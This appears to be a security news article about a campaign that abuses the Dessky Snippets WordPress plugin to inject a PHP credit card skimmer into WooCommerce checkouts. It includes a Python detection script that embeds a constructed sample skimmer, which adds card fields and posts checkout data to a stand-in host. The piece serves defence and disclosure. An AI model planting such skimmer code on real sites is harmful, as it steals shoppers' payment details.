
WordPress plugin used to steal credit card information from e-commerce sites

May 28, 2024 | Newsroom | Data Protection / Skimming


Unknown threat actors are using lesser-known WordPress snippet plugins to insert malicious PHP code into victim sites that can collect credit card information.

The campaign that Sucuri observed on May 11, 2024, involves the abuse of a WordPress plugin called Dessky Snippets, which allows users to add their own PHP code. It has over 200 active installations.

Such attacks have been known to exploit known flaws in WordPress plugins or easily guessed credentials to gain root access, then install additional plugins (legitimate or otherwise) for later exploitation.

Sucuri said the Dessky Snippets plugin is used to inject a server-side PHP credit card skimmer onto compromised sites and steal financial data.


“This malicious code was stored in the dnsp_settings option in the WordPress wp_options table and was intended to modify the WooCommerce checkout process by manipulating the checkout form and injecting custom code,” said security researcher Ben Martin.

Specifically, it adds several new fields to the billing form that request credit card information, including names, addresses, credit card numbers, expiration dates, and Card Verification Value (CVV) numbers, which are then exfiltrated to the URL “hxxps://2of(.)cc/wp-content/”.

A noteworthy aspect of the campaign is that the billing form associated with the fake overlay has its autofill (HTML autocomplete) attribute disabled (i.e. autocomplete="off").

“Manually disabling this feature on a fake transaction form reduces the likelihood that the browser will warn the user about entering sensitive information and ensures that fields remain blank until the user manually fills them in, which reduces suspicion and makes the fields look like regular, required transaction inputs,” Martin said.
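The traits described above (a checkout hook, injected card fields with autocomplete disabled, and an outbound request to a foreign host) can be turned into a simple audit of whatever PHP a snippet plugin has stored in wp_options. The following is an added example, not code from Sucuri or from the plugin; the snippet text, the `exfil.example` host and the `shop.example` site name are constructed for illustration, and the indicator patterns are assumptions that a site owner would tune to their own theme and plugins.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a snippet stored in a WordPress option (not the real malware):
# it hooks the WooCommerce checkout, adds card fields with autocomplete="off",
# and posts the submitted values to a third-party host.
SAMPLE_SNIPPET = '''
add_action('woocommerce_after_checkout_billing_form', function () {
  echo '<input name="cc_number" autocomplete="off">';
  echo '<input name="cc_expiry" autocomplete="off"><input name="cc_cvv" autocomplete="off">';
});
add_action('woocommerce_checkout_process', function () {
  wp_remote_post('https://exfil.example/wp-content/', ['body' => $_POST]);
});
'''

# Constructed benign snippet of the kind such plugins are normally used for.
BENIGN_SNIPPET = "add_filter('woocommerce_currency_symbol', fn($s) => 'USD ');"

# Indicator patterns (assumed, not an official signature set).
CHECKS = [
    ("card_fields", re.compile(r'(card_?number|cc_?num|cvv|cvc|expir)', re.I)),
    ("autocomplete_off", re.compile(r'autocomplete\s*=\s*["\']?off', re.I)),
    ("checkout_hook", re.compile(r'woocommerce_(after_)?checkout', re.I)),
    ("outbound_request", re.compile(r'(wp_remote_post|curl_exec|file_get_contents)\s*\(', re.I)),
]
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.I)

def audit_snippet(code, site_host):
    """Return the names of the indicators triggered by a stored PHP snippet.
    `code` is the option value, e.g. the dnsp_settings option named in the article."""
    hits = [name for name, rx in CHECKS if rx.search(code)]
    # Any URL whose host is not the site itself counts as a possible exfiltration endpoint.
    foreign = [u for u in URL_RE.findall(code) if urlparse(u).hostname not in (site_host, None)]
    if foreign:
        hits.append("external_url")
    return hits

def is_suspicious(code, site_host):
    """Flag the combination that characterises this skimmer: card capture plus an exit path."""
    hits = audit_snippet(code, site_host)
    return ("card_fields" in hits or "autocomplete_off" in hits) and (
        "external_url" in hits or "outbound_request" in hits)

if __name__ == "__main__":
    for label, snippet in (("sample", SAMPLE_SNIPPET), ("benign", BENIGN_SNIPPET)):
        print(label, audit_snippet(snippet, "shop.example"), is_suspicious(snippet, "shop.example"))
```

The option value to feed in can be exported from the database or with WP-CLI (`wp option get <option-name>`); a hit on `is_suspicious` warrants pulling the site offline for a manual review rather than automatic deletion.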

This is not the first time that cybercriminals have resorted to using legitimate snippet plugins for malicious purposes. Last month, the company exposed the abuse of the WPCode snippet plugin to inject malicious JavaScript code into WordPress sites to redirect site visitors to VexTrio domains.


Another malware campaign called Sign1 was discovered to have infected over 39,000 WordPress sites over the past six months, using malicious JavaScript injection via the Simple Custom CSS and JS plugin to redirect users to fraudulent sites.

WordPress site owners, especially those offering e-commerce functionality, are advised to keep their sites and plugins up to date, use strong passwords to prevent brute-force attacks, and regularly check their sites for signs of malware or any unauthorized changes.
